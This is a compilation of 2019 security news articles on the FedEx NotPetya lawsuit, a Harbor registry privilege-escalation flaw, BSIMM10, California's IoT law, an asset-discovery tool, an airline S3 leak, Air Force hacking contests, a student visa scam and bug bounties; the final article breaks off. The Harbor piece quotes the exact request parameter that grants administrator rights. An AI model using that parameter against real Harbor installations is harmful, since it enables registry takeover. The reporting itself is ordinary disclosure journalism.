STE WILLIAMS

FedEx execs: We had no idea cyberattack would be so bad. Investors: Is that why you sold $40m+ of your own shares?

FedEx execs not only hid the impact of the NotPetya ransomware on their business but personally profited by selling off tens of millions of dollars of their own shares before the truth came out, a lawsuit filed by the delivery business’ own shareholders claims.

The legal complaint [PDF], filed in Delware, USA, this week, accuses the shipping giant and its top brass of giving “materially false and misleading statements” about the impact of the malware infection on its European subsidiary TNT Express in June 2017. And, the paperwork notes, several top execs off-loaded their shares before the damage caused by the cyber-attack became known and the share price plummeted.

FedEx founder Frederick Smith sold $31m worth of stock at $256 per share in April 2018, and its chief operating officer David Bronczek did the same in January 2018, netting $12m by selling at $225 a share. Other execs are listed as selling roughly $1m a piece in shares around the same time. The share price currently stands at $152 after a massive drop in December 2018, primarily due to its uncertain outlook in Europe for 2019.

FedEx: TNT NotPetya infection blew a $300m hole in our numbers

READ MORE

Despite FedEx going to some lengths to highlight the impact of the file-scrambling malware on its business – including suspending its shares back in June 2017, and announcing a $300m loss thanks to the code a few months later that September – the shareholders argue that the exec team downplayed the depth of the problem.

At the time, FedEx stressed that no information had been stolen by the cyber-nasty, and only some offices of TNT Express had been disrupted. “Remediation steps and contingency plans are being implemented as quickly as possible,” it said in a statement. But, at the same time, it also refused to answer questions from the press.

The lawsuit, led by shareholder Jason Flaker, claims that FedEx did not flag that growth of its European TNT subsidiary was slowing down as a result of clients that “permanently took their business to competitors.” It also claims that FedEx was less than fully honest about the cost and effort required to get the TNT systems back up and running.

Detriment

As for the share-dumping execs, the lawsuit accuses them of being “unjustly enriched at the expense of and to the detriment of FedEx” while “breaching fiduciary duties” and engaging in insider selling because there were “in possession of material, nonpublic information that artificially inflated the price of FedEx stock.”

You may think that this is just a case of sore investors losing money, but back in July this year, FedEx was hit with another similar lawsuit claiming execs has downplayed the impact of the cyberattack: law firms are queuing up to get a piece of that action.

In fact, lawyers are going to be dining out on the enormous impact of NotPetya: one of the most notable cases being when US snack food giant Mondelez sued its own insurance company in January this year for $100m after the insurers claimed the malware was “an act of war” and therefore it wouldn’t pay out. That case is still ongoing.

A spokesperson for FedEx was not available for immediate comment. ®

Sponsored:
Beyond the Data Frontier

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/09/19/fedex_execs_sued/

If you’re using Harbor as your container registry, bear in mind it can be hijacked with has_admin_role = True

Video IT departments using the Harbor container registry will want to update the software ASAP, following Thursday’s disclosure of a bug that can be exploited by users to gain administrator privileges.

Aviv Sasson, of Palo Alto Networks’ Unit 42 security team, found that under its default settings, Harbor accepts an API call that can, inadvertently, elevate a normal user’s permissions. If you can reach a vulnerable Harbor installation’s web interface, you can potentially pwn it.

Seeing as Harbor is used by enterprises and cloud platforms to manage collections of Docker and Kubernetes containers, which themselves contain applications and other resources, gaining administrative access is a big deal: a rogue admin can swipe data from the registry, or tamper with containers to inject malware into services.

“The attacker can download all of the private projects and inspect them. They can delete all of the images in the registry or, even worse, poison the registry by replacing its images with their own,” Sasson explained. “The attacker can create a new user and set it to be admin. After that, they can connect to Harbor registry via the Docker command line tool with the new credentials and replace the current images with anything they desire.”

The flaw itself is in the code behind the registry’s HTTP POST-based API. Sasson discovered that a miscreant can request the creation of a new account and enable an admin for this user all at the same time. This registration request is not properly screened, and the admin account creation is approved. It is as simple as setting a flag, has_admin_role, in the request to True.

“The problem,” said Sasson, “is that we can send a request and add the parameter…

"has_admin_role" = “True”

…the user that will be created will be an admin. It’s as simple as that.”

Here’s a video demonstrating exploitation of this programming blunder:

Youtube Video

Admins can edit the default settings to prevent this from happening, though Sasson reckons that most are unaware of that. Of a scan of 2,500 online public-facing Harbor instances, 1,300 were found to be vulnerable.

The vulnerability is designated CVE-2019-16097. Sasson and Unit 42 opted not to brand it with a cute nickname. Good on them.

The bug was found in Harbor versions 1.7.0, 1.8.2, and prior. Sysadmins can close the vulnerability by updating to versions 1.7.6, 1.8.3 and later. ®

Sponsored:
Beyond the Data Frontier

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/09/19/harbor_registry_patch/

BSIMM10 Emphasizes DevOps’ Role in Software Security

The latest model, with insights from 122 firms, shows DevOps adoption is far enough along to influence how companies approach software security.

DevOps has reached a point in its adoption at which it influences the way organizations approach software security. Many businesses have implemented an engineering-led security culture to establish and grow software security efforts, researchers say in the BSIMM10 report.

The Building Security in Maturity Model (BSIMM), now in its 10th edition, is the product of a multiyear study of real-world software security initiatives (SSIs) seen in 122 businesses. Synopsys researchers annually compile the BSIMM report to help organizations develop software maturity programs with insights and guidance from real-world firms across industries.

They call the BSIMM a “measuring stick” for software security. Firms can compare the report’s findings to their own projects and gain a better sense of how other organizations are handling the same initiatives. “You can identify your own goals and objectives, then refer to the BSIMM to determine which additional activities make sense for you,” according to the report.

Ten years ago, security was a differentiator for highly regulated firms, many of which build a governance-driven software security initiative to drive security across their portfolio, explains Sammy Migues, information security visionary at Synopsys and one of the report’s authors.

Now, BSIMM10 shows changes in how companies approach software security. A new wave of engineering culture is driving security efforts from engineering teams. There are two major factors in the shift: First is the convergence of process friction, unpredictable effects on delivery schedules, tense relationships, and more human-intensive processes from current SSIs. Second are demands and pressures from modern software delivery methods like Agile and DevOps. As a result, engineering has begun to prioritize automation over human-driven tasks, experts say. Decisions that used to fall to five-person meetings can be made more quickly with Python.

There are more issues at play when it comes to engineering culture, Migues says. Management has been asking more of development teams over the past few years, and developers have dealt with new languages, security requirements, deployment environments, and other changes. Modern ops teams use new logging and analysis methods; emphasis is on efficiency.

“Anything that represents friction or opaqueness is sort of getting pushed aside,” he adds. “If security is too slow for the dev team, the dev team is going to do its own security.” The “old school” security team has to learn how to play in the DevOps culture, Migues emphasizes. Developers’ natural response to managerial pressure is to deliver more software, and faster.

What This Means for Security Groups
The industry is seeing the rise of an organizational structure that values SSI but doesn’t integrate software security groups (SSG) into the process as an assigned group, the BSIMM10 reports. The SSG starts organically, usually within the engineering group. Engineers take on roles like “BuildSec,” “ContainerSec,” and “DeploymentSec,” testing out specific capabilities like operations security or incident response before they form dedicated security-specific divisions.

In the past year, he says, researchers have noticed a rise in software security efforts within engineering organizations as engineers build out their own security capabilities. “They’re taking all these little piece parts of security related to software, and they’re doing it themselves,” says Migues, noting that this often happens outside the view of the central security department.

Security teams have become accustomed to testing software after its completion and deciding then whether the code is strong enough to go into production. In the future, he says, security teams will become part of the application life cycle, or “value stream,” to use a DevOps term.

“If you’re not part of the value stream, you’re going to be ignored,” Migues adds. It’s not a question of hiring, he explains. It’s a matter of security catching up to the DevOps culture. “You aren’t going to solve tomorrow’s security problems by hiring more security people.”

New Additions to the BSIMM
Researchers adjusted the descriptions of several activities, and added three new ones, to the BSIMM so as to reflect what firms are doing to integrate software security. The three activities in BSIMM10 include software-defined life cycle governance, software-assisted monitoring of software-defined asset creation, and automated verification of software-defined infrastructure.

These additions reflect how businesses are working on ways to accelerate security to match the speed of delivering functionality to market. “These are also direct offshoots of this new engineering-driven culture that’s sort of dragging security behind it,” Migues says. Most organizations don’t have a top-down push to build security into development. Instead, pockets of security are happening at the bottom and getting pulled to the top across the dev team.

It’s important to understand the difficulty of integrating security into DevOps greatly varies depending on the organization, he continues. Those who are doing DevOps well have homogeneous software portfolios, which gives them an advantage. Netflix, for example, has one application and, consequently, one development culture, Migues explains. “Changing a culture in that kind of homogeneous environment is not that hard,” he continues. While the process can certainly take a long time, it’s more streamlined to rally everyone around a common goal.

In contrast, a Fortune 500 bank may have thousands of applications and several development teams. A process that works for one application may take years to spread across an entire bank, he adds. Smaller companies also have it easier because they have fewer heterogeneous environments. Fewer tech stacks enable a more seamless process than in larger companies.

Related Content:

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “The 20 Worst Metrics in Cybersecurity.”

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/application-security/bsimm10-emphasizes-devops-role-in-software-security/d/d-id/1335862?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

California’s IoT Security Law Causing Confusion

The law, which goes into effect January 1, requires manufacturers to equip devices with ‘reasonable security feature(s).’ What that entails is still an open question.

Companies that make connected devices — from Internet routers to connected thermostats to home-monitoring cameras — need to start preparing for the enforcement of California’s Internet of Things (IoT) security law, which goes into effect on January 1, 2020, attorneys said this week.

The question is whether a simple authentication fix is enough for most devices or whether companies need to adhere to a more rigorous standard.

The California law, Senate Bill 327, was approved by the governor a year ago and requires that all connected devices sold in the state— no matter where they are made — incorporate “a reasonable security feature or features” that appropriately protect the user of the product and the user’s data from unauthorized access, modification, or disclosure. The law specifies that single hard-coded passwords are not allowed, and each device must either have a unique passcode or require the user to generate a new passcode before using the device for the first time.

The way the law is written, ensuring devices follow that guidance may be enough, says Christine Lyon, partner in the privacy practice of Morrison Foerster. “The law is only specific to authentication,” she says. “That seems sufficient, but what I suspect will happen over time is that we will see more specificity around the required security features.”

Yet another attorney argues that establishing a strong authentication mechanism is only one of the required features. Guidance of what constitutes “reasonable security” is hinted at by a 2016 California breach report, which labeled the Center for Internet Security’s Critical Security Controls for Effective Cyber Defense as the “floor” for adequate security, says Dan Pepper, a privacy and data protection partner at the law firm BakerHostetler.

“The law is offering companies flexibility,” he says. “But if all you are doing is taking the authentication step and you are not doing anything with updates or patches, encryption, or third-party components, then you are falling short. That authentication piece is just one concrete example.”

The confusion has caused many companies to measure whether there is any risk to them under the statute and to wait for further guidance, the attorneys say. The law does not give consumers the right of private action. Only the government can investigate or penalize companies under the law, which is another consideration for companies in assessing their risk.

While the security required by the law may seem like baby steps, the number of devices impacted by the legislation is quite large, according to the attorneys. The text of the legislation does not specify types of devices, but the law likely applies to a long list of hardware covered by the term “connected device,” including products such as printers and security cameras, smart lightbulbs, and Apple watches, Pepper says.

“Quite a few different types of devices are impacted,” he says.

The California law is not the only legislation to target the security of connected devices. With 25 billion devices expected to be part of the global IoT landscape, legislators are subjecting IoT manufacturers to increasing scrutiny. 

In March, US lawmakers introduced a bipartisan bill into Congress that would require IoT makers selling devices to the government to follow guidelines produced by the National Institute of Standards and Technology. Known as the Internet of Things Cybersecurity Improvement Act of 2019, the bill is the third time that federal legislation has been introduced to require security measures by connected device makers. A bill to govern IoT security has been introduced into Congress annually since 2017.

Because the California law applies to any device sold to consumers in the state — and the manufacture of too many product variants is cost-prohibitive — the impact of the law will likely be national, says Morrison Foerster’s Lyon.

“Because the law’s requirements are not onerous, and because it is time consuming to create a special version of products just for the Californian market, companies will probably implement these changes across all their products,” she says.

In conjunction with the California Consumer Privacy Act (CCPA), the law will put new responsibilities and restrictions on companies for privacy and data security.

“The enactment of the CCPA will be a watershed moment for data privacy not just in California, but also throughout the United States,” said Attila Tomaschek, data privacy advocate at ProPrivacy.com, in a statement. “Since any applicable business across the country and indeed across the globe that serves consumers in California will be required to abide by the law, companies across the board will likely be gearing up for compliance.”

The California law explicitly does not require that retailers and sellers of devices ensure compliance with the law. The law also seems to prevent using the rule as a reason for anti-tinkering measures, stating that the laws does not require features that “prevent a user from having full control over a connected device, including the ability to modify the software or firmware running on the device at the user’s discretion.”

In addition, law enforcement retains the right to gather information about devices from the manufacturer. 

Related Content:

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “Poll Results: Maybe Not Burned Out, But Definitely ‘Well Done’

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline … View Full Bio

Article source: https://www.darkreading.com/iot/californias-iot-security-law-causing-confusion/d/d-id/1335863?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Metasploit Creator HD Moore’s Latest Hack: IT Assets

Moore has built a network asset discovery tool that wasn’t intended to be a pure security tool, but it addresses a glaring security problem.

HD Moore, famed developer of the wildly popular Metasploit penetration testing tool, is about to go commercial with a new project he originally envisioned would give him a nice break from security.

Moore’s IT asset discovery tool. Rumble Network Discovery. aims to solve one of the most basic yet confounding problems organizations face and have faced for years: getting a true inventory of all of the devices and services running in their increasingly diverse and growing networks. Misconfigured systems. misconfigured network settings, and unknown unpatched devices sitting on the network are among the most common weak links that expose enterprises today to attacks and data breaches. It’s a problem getting exacerbated now with the official — and sometimes unofficial — arrival of Internet of Things (IoT) devices on networks.

The renowned security expert, who over the years has also conducted eye-opening research on millions of exposed corporate devices sitting vulnerable on the public Internet, had been bumping up against the network discovery process when building his security tools.

“Every time I’ve written a security product … Metasploit Pro or working on the [Rapid7] Nexpose product, or my prior vulnerability management [tools] I worked on at DDI [Digital Defense Inc.] and BreakingPoint, the very first step of running these things is building a great discovery engine. I never felt like we had enough time,” says Moore, founder and CEO of Critical Research Corp., and vice president of research and development at Atredis Partners.

HD MoorePhoto courtesy of HD Moore

HD Moore

Photo courtesy of HD Moore

As a penetration tester, he found internal discovery and monitoring lacking at many organizations. “The challenge I ran into is that most customers that I had done security work for didn’t have the ability to centrally monitor all of their traffic in the first place,” he says. “They had huge distributed sites all over the place with strange firewalls and strange rules,” for example, and no way to properly find those devices and configurations.

It’s not there aren’t any IT asset discovery and security tools available today. There’s the popular open source Nmap program, as well as commercial offerings from Armis, Claroty, Cynerio, Forescout, and others, he says. Some focus on passive network discovery in sensitive environments, such as industrial control systems, and study traffic patterns.

But Moore says the underlying challenge remains that most of today’s discovery tools require administrative access control of the network devices as well as visibility. “If you have that stuff, their products work great,” he says.

However, healthcare networks, large retailers, and universities struggle here because of the fluidity and mobility of user devices connecting to their networks. “Higher education, in particular, struggles quite a bit, with tens of thousands of machines [for example] that are student machines and they don’t directly manage,” he says.

They can adopt central monitoring, but those products often are too pricey for the typical state university. “That’s what kind of rankled me: No one had really spent a lot of time doing active discovery right. Current solutions require having credentials and network-traffic monitoring,” he says.

The goal of Rumble, he says, is to provide a discovery tool that doesn’t require credentials to inventory the devices or monitor the ports. “You can just drop it into a network and find everything,” Moore says.

It sounds so simple and obvious — a true mapping and inventory of devices and their status on the network — but it’s one of the biggest security holes for many organizations.

And it turns out, of course, that Moore hasn’t actually been able to take a sabbatical from security with Rumble. Rumble is already resonating with security managers and researchers who have been beta-testing it over the past six months. To date, it tracks more than 1.8 million network assets and runs 1,500 scans per day, with some 2,000 users.

Moore had wanted to build the tool for IT people who may or may not have security experience or responsibilities, but most of his beta users have been IT people with security roles, security researchers, or IT managers from universities, healthcare organizations, service providers — and even bug bounty organizations.

“Starting out I wanted to avoid security entirely; I didn’t want to sell another security product. I wanted to sell something that was directly useful and didn’t rely on like, five other things, to be useful,” says Moore.

In Moore’s hometown of Austin, University of Texas network security analyst Christian Gugas and his team have been testing Rumble for the past couple of months to check for vulnerabilities in university-issued faculty user systems — mainly for the BlueKeep vulnerability, which exposes Windows machines via the Remote Desktop Protocol [RDP].

“What we would try to do is organize those searches and afterward see what machines had that [RDP] port open. We would try proof-of-concept code to see if we could do anything with those machines” in those tests,” Gugas explains.

Gugas says he was impressed with the speed of Rumble — it was faster for his team than Nmap — and the level of detail it provided on the devices the team scanned. There were a couple of false positives, he says, but the results overall were “pretty damn good,” and exporting the data into JSON files let his team’s scripts grab it and catalog it.

Security expert James Boyd, a member of the San Antonio Hackers Association, tested Rumble on his home lab network, on a Linux-based virtual machine. Rumble right away spotted and fingerprinted some rogue machines and wireless access points he had planted in the lab network.

“Everyone wants to do red team [and now blue team],” he says. “No one wants to track what’s on your network; that’s considered boring.” But it’s probably one of the most overlooked parts of security, he adds.

How Rumble Works
Rumble, which officially moves from beta to production at the end of this month, comes in a command-line scanner that can be downloaded for running it offline, or with agents that run on most any platform and use a cloud-based console. The Go-based platform scans Layer 2 and 3 and “fingerprints” applications, Moore explains. Unlike most scanners, it employs a small number of probes to get as much detail about devices on the network as possible.

The “secret sauce” is mostly how Rumble can “leak” information about a device from its MAC address, such as its network interfaces. “For a lot of IT folks, the MAC address is the absolute source of truth for how they manage inventory,” he says. MACs uniquely identify devices, while IP addresses — which are used for some discovery tools — change, he notes.

Rumble determines the specifics on the device without needing to authenticate to it. “When we do a scan, we can use the MAC to leak out hostnames, stack fingerprints … and merge it all together to see what device is on the network,” he says.

That would help to determine, for instance, whether a device was communicating across a nonauthorized network segment, such as a payment card network that wasn’t supposed to be connected to a retail operations network.

A look at Rumble Network Discovery's user interface.Source: Critical Research Corp.

A look at Rumble Network Discovery’s user interface.

Source: Critical Research Corp.

But Rumble does not identify malware in the network. That type of detection typically entails traffic monitoring, Moore says, which isn’t the goal of Rumble. “We are looking for how does it respond to the network, what services are exposed,” for example, or which Windows machines are part of the Active Directory Domain, he says.

It employs a homegrown “Splunk-style” search engine, he says. The scan and search data can be pulled into a JSON, CSP, or other type of file, and regular scans can be scheduled to run in the background.

Shades of previous HD Moore projects are in Rumble, too. Probes from his 2013 work at Rapid7 on UDP leaks with the discovery of nearly 50 million networked devices exposed on the Internet via flaws in the Universal Plug and Play (UPnP) protocol, as well as other probes he developed, are woven into Rumble, as well as the fruits of other vulnerability research he has conducted over the years.

What’s Really On the Network
Moore says Rumble has rooted out some shocking residents on corporate networks, such as PlayStation 4s and Amazon Echoes. “Consumer-level technology has made its way into every corporate network we’ve ever scanned,” he says. “You see a lot of smart TVs and Apple TV kits … definitely not your typical enterprise equipment.”

He expects managed service providers to be Rumble’s main sweet-spot customer, but he has seen mainly healthcare, state government, and higher education organizations testing it to date. The hope is to keep Rumble affordable for those budget-strapped organizations. “We are looking at being one-fourth or one-third the cost of any comparable security tool,” he notes.

Moore is offering a 50% discount for beta users who graduate to commercial status by October 15. For organizations scanning up to 256 devices, it’s $495 per year; pricing scales with the size of the organization, at $49,995 per year for scanning up to 100,000 devices, for example.

Rapid7 chief scientist Bob Rudis has been testing Rumble both in Rapid7’s labs as well as in his home network. As a security expert diligent about keeping his home network locked down, he thought it was pretty solid: no Wi-Fi for his IoT, for example, and mostly Zigbee for communications. But when he ran Rumble on the network, the tool discovered that his weather station device had updated its software and opened an unauthenticated telnet service on his LAN. “I missed something, and this tool caught it,” he says.

Meanwhile, Moore says the initial commercial release is just the beginning. Network discovery is an ongoing challenge, and he expects to be updating Rumble for a long time to come. 

“It’s really boiled down to we want to do an awesome job at discovery and just discovery, and keep our focus on identifying products and identifying services [in the network],” Moore says. “It’s not the most interesting or sexy-sounding technology, but it’s where people actually need help.”

Related Content:

 

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “The 20 Worst Metrics in Cybersecurity.”

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: https://www.darkreading.com/analytics/metasploit-creator-hd-moores-latest-hack-it-assets-/d/d-id/1335860?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Lion Air the Latest to Get Tripped Up by Misconfigured AWS S3

The breach, which reportedly exposed data on millions of passengers, is one of many that have resulted from organizations leaving data publicly accessible in cloud storage buckets.

A breach that reportedly exposed data on millions of passengers of two Lion Air airline subsidiaries is another example of the massive exposure that organizations face from leaving data in poorly secured cloud storage.

The breach — like hundreds of others — resulted when files containing the Indonesian airlines’ passenger names, passport numbers, birth dates, home addresses, and other data — was left openly accessible in an Amazon Web Services (AWS) storage bucket.

The data belonged to passengers of Malindo Air and Thai Lion Air. A Dark Web operator known as Spectre later dumped four files — two containing data from Malindo and two with data on Thai Lion Air — online, South China Morning Post (SCMP) reported this week.

Malindo Air confirmed the breach in a statement on its website but did not provide any details on the scope of the compromise. The company said it was in the midst of notifying passengers about the data compromise, while adding that no payment card details had been exposed in the incident.

“Our in house teams along with external data service providers, Amazon Web Services (AWS) and GoQuo, our e-commerce partner, are currently investigating into this breach,” Malindo Air said.

The Lion Air breach is one of many involving Amazon’s S3 storage service. Some of them have been massive in scope and resulted from victim organizations themselves not properly securing access to their data in S3. In other instances, the compromises have resulted from third parties making the same mistake.

In June, Australian cybersecurity vendor UpGuard reported on data integration firm Attunity’s exposing a terabyte’s worth of backups belonging to companies including Ford, Netflix, and TD Bank by putting the data in three publicly accessible S3 buckets. Recently, a Mexican media company exposed more than 540 million records containing comments and interests of Facebook users by leaving the data in an unprotected S3 container.

UpGuard has described detecting literally thousands of breaches over the past few years resulting from poorly configured S3 security settings. The bigger of those have included a breach that exposed GoDaddy’s trade secrets and infrastructure details, a leak of 14 million customer records by Verizon, and the breach of a Chicago voter’s database in 2016 right around the general elections.

Amazon S3 misconfigurations have become one of the most common and widely targeted attack vectors across all industries, says Anurag Kohli, CTO at Bitglass. “It does not take much for outsiders to find unsecured databases and access sensitive information” on services like S3, he says. Tools are available that let people search for misconfigured and easily abused cloud storage buckets, he notes. “[Internet-as-a-service] platforms are not inherently unsafe – organizations just have to use them safely,” Kohli says.

Organizations that use services like Amazon often mistakenly believe the provider or service itself is responsible for the vast majority of the work when it comes to ensuring proper cybersecurity. However, it is ultimately up to the customer to use and configure these platforms appropriately, Kohli says.

According to UpGuard, with S3 related breaches, AWS itself may be making it easy for users to make mistakes even though it has introduced improvements overall to help organizations detect and avoid common configuration errors.

Easy to Misconfigure
In an August blog, UpGuard pointed to two product features it said could trip up S3 users. One of them is a feature that, if not used correctly, would allow any authenticated user with an AWS account to see content in another user’s storage bucket. “It’s like if your Internet banking credentials worked to log into someone else’s bank account,” UpGuard said.

The second issue has to do with people misunderstanding how S3 settings for access control lists (ACLs) and policies governing access to storage buckets work, the vendor said. It is an easily misunderstood issue that has led to major S3-related breaches. According to UpGuard, organizations can lock down ACLs to an Amazon S3 bucket but still leave data wide open by misconfiguring the bucket policy itself.

Chris DeRamus, CTO of DivvyCloud, says Amazon has been actively working to help companies avoid breaches caused by misconfigurations. It has also added a number of new features to augment data protection and simplify compliance. For instance, AWS has made it easier for organizations to ensure encryption of all new objects, along with monitoring and reporting on their encryption status. AWS also has guidance on using tools like AWS Config to monitor and respond to S3 buckets that allow public access, DeRamus says.

“Breaches of data in the cloud are on the rise, not breaches of the underlying cloud provider’s infrastructure,” he notes. “The cloud provider is responsible – and typically successful in – securing the underlying components of cloud services.”

It is up to the customer to ensure secure use by properly configuring identity and access management, storage, and compute settings, and using threat analysis and defense tools to mitigate threats, DeRamus says. Automated tools are available that allow organizations to perform real-time, continuous discovery of cloud infrastructure resources and to identify risks and threats that need to be remediated, he adds.

“There’s no excuse for leaving data unprotected in AWS storage,” says Tim Erlin, vice president of product management and strategy at Tripwire. “This isn’t a new problem, and it’s not a technically complex issue to address.”

Related Content:

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “The 20 Worst Metrics in Cybersecurity.”

 

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/lion-air-the-latest-to-get-tripped-up-by-misconfigured-aws-s3-/d/d-id/1335864?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Air Force to offer up a satellite to hackers at Defcon 2020

Last month, when the US Air Force went to the Defcon hacker conference, it dragged along an F-15 fighter-jet data system.

The destination: a corner of the conference where the first-ever Aviation Village brought together the aviation industry with the infosec/hacker community. There, vetted security researchers picked that system to pieces.

As in, they literally went at it with screwdrivers and pliers. They filled hotel glasses with screws, nuts and bolts from the Trusted Aircraft Information Download Station. They also remotely inflicted malware on the unit, which collects video and sensor data while the F-15 is in flight.

The attitude of the Air Force to the results: well, that went well. Now, the Air Force has decided to up the ante, as Wired reports. Next year, it’s offering up an orbiting satellite.

Will Roper, the Air Force’s top acquisition official, told the Washington Post that he wasn’t surprised at this year’s results with the F-15 subsystem. He expected the results to be this bad, given decades of neglect of cybersecurity, added to the military’s hitherto, mostly hands-off approach to penetration testing from the private sector – not to mention what the Post calls the “arcane and byzantine” military contracting process, in which companies that build software components won’t let the Air Force pry apart their products for testing.

As Wired has reported, aviation companies have flat-out denied the validity of security researchers’ findings, in spite of some tragic outcomes: faulty controls were implicated in two crashes that killed 346 people in the Lion Air and the Ethiopian Airlines incidents, for example.

Roper told C4ISRNET – a digital magazine focused on military information technology – that these days, the government’s thinking has shifted from its Cold War stance on keeping things close to the vest. It’s essential that it do so, he says:

Historically, we have been very closed about our vulnerabilities. That made sense during the Cold War. When a new technology was developed – whether it was satellites, microprocessors, stealth enhancements – these were big deals and we needed to be very secretive about that technology because to lose it was to lose a decade.

But now technology changes so rapidly, and most of it is driven by software. The idea that closed can make you more secure is a hypothesis we need to question. Industry is going more toward open, being secure by allowing external experts to find vulnerabilities in a way that protects them so that they’re not legally culpable but that provides a safe conduit to make those available to the government.

Vetted researchers’ hacking of an F-15 this year and next year’s hacking of a satellite are just the latest signs of this evolution in the government’s approach to military cyber-, hardware, and supply-chain security.

In 2017, we saw the Air Force offer its first-ever bug bounty program, Hack the Air Force. The Pentagon did the same thing the year before, as did the US Army.

By the end of the third Hack the Air Force challenge – run as a collaboration between the Department of Defense (DoD) and the HackerOne bug bounty platform – $130,000 had been paid out to hackers in exchange for a total of 120 vulnerabilities, HackerOne announced in December 2018.

How to hack a satellite

According to Wired, the Air Force will put out a call for submissions “sometime soon.” Six months before next year’s Defcon, a number of researchers with viable pitches will be invited to try out their ideas during a “flat-sat” phase: basically, a test build comprising all the eventual components. That group will be further culled, and the Air Force’s vetted picks will be flown to Defcon for a live hacking competition.

Roper:

What we’re planning on doing is taking a satellite with a camera, have it pointing at the Earth, and then have the teams try to take over control of the camera gimbals and turn toward the moon. So, a literal moon shot.

Which specific satellite will be targeted hasn’t yet been determined, but Wired says that it will likely be one flying in low Earth orbit. Nor has it been determined how many teams will be selected in each round, or how much money will be paid out for a final cash award.

Given that this is military equipment, the researchers will again have to be vetted, same as for the F-15.

Roper is hoping that it’s worth the hassle, though. The Air Force wants the security community to get its hands on these systems as early in the process as possible, so it doesn’t keep building on top of vulnerable systems, he said:

We want to hack in design, not after we’ve built. The right place to do it is when that flat-sat equivalent exists for every system. Let the best and brightest come tear it up, because the vulnerabilities are less sensitive then. It’s not an operational system. It’s easier to fix. There’s no reason not to do it other than the historical fear that we have letting people external to the Air Force in.

How can the Air Force possibly top the invitation to come hack a satellite? Well, Roper says, he’s next working on getting an entire plane to Defcon. The difficulty of pulling that off?

The conference lacks the space.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/wh-pZprliQk/

Chinese students in UK ripe target for scammers exploiting visa concerns

Scammers are exploiting Chinese students’ Brexit fears by targeting them with phishing emails claiming their visas could be revoked, threat intel researchers say.

The swindle, a latter-day variation on an age-old theme, consists of presenting a threat to students’ immigration status “and uses various techniques to extract sizeable payments from the victims”, according to Malwarebytes.

Pointing to open UK student admissions data as a “broad surface of attack”, Malwarebytes reckons that this openness leads to scammers knowing exactly which institutions to target. This, it said, lets criminals easily exploit current Brexit-related visa fears to target naive students, most of whom will be living abroad for the first time ever.

“There is a persistent incorrect stereotype that Chinese students in the UK all come from wealthy families,” said the firm in a blog about its findings.

While scams targeting overseas students go back years, its latest incarnation revolves around using stolen credentials to target vulnerable marks. In one example, a student whose laptop was stolen at Heathrow Airport began receiving phone calls from people claiming to be Chinese Embassy workers. They said the student had been implicated in a money-laundering scam.

To convince students that the scammers were actually police investigators, they were sent links to a website appearing to belong to the Chinese authorities. Displayed on that website was personal data that had been lifted from the student’s stolen laptop – scans of ID cards, mugshots, banking details, and so on.

“By the time they’d forced the student to upload a recorded statement to the social media site QQ and threatened them with deportation and imprisonment via web streams of men dressed up as police, they were likely too panicked to realise where they’d obtained all this information from in the first place,” said Malwarebytes’ Christopher Boyd.

Once targeted in this way, marks were “encouraged” to send large sums of money to the “prosecutors” and buy them off.

Aside from the general security advice – encrypt your devices, enable multi-factor authentication and use password managers – the most important point is that UK authorities do not phone people up or contact them online to tell them they’re under investigation.

Nor do they demand money over VoIP calls. If you or someone you know starts getting messages from people claiming to be investigators, tell your university staff or even contact the police yourself through non-emergency means to verify the messages. ®

Sponsored:
What next after Netezza?

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/09/19/student_visa_brexit_fears_scam/

Crowdsourced Security & the Gig Economy

Crowdsourced platforms have redefined both pentesting and the cybersecurity gig economy. Just not in a good way.

Let’s pretend you have offensive security skills and you want to use them for gainful employment. You attend a job interview and you listen to the benefits of what this company has to offer. First of all, most of the time you’ll be working for free — unless you find a vulnerability, and then they might pay you a few weeks later. You’ll also receive no paid sick days, paid holidays, or days off of any kind because, well, you’re working for free remember?

The tools you’ll need for this job — laptops, mobile devices, and any other widgets — you’ll have to provide yourself. As for a pension… of course not. No subsidized gym memberships, health insurance, discount vouchers, free breakfasts, or free food of any kind.

This is the reality for thousands of individuals who work on bug bounty programs for various crowdsourced security companies. And it’s hard to find a comparison with other companies in the current gig economy (such as Uber, Airbnb, and Deliveroo), where employees work their own hours and forgo traditional employee benefits (holidays, pensions, etc.) as a trade-off. The one crucial difference: Gig economy workers are actually paid for their labor and can predict their income if they choose to invest two hours or two days a week.

Let me elaborate. You’ll only be paid on bug bounties if you find vulnerabilities. To find vulnerabilities, you have to invest your time. Sometimes, you might be lucky and find critical, high-paying vulnerabilities in minutes; I was once lucky enough to find $6,000 of vulnerabilities in 30 minutes — not a bad hourly rate. But these findings are the exception, not the norm. Most of the time, you don’t find any vulnerabilities at all. That’s hard to reconcile if you spent six or seven hours trawling through an application and came up empty handed — you get nothing for your time. Worse, you might actually find a vulnerability but it’s classed as a “duplicate,” meaning someone else before you had already found it, and you still get nothing.

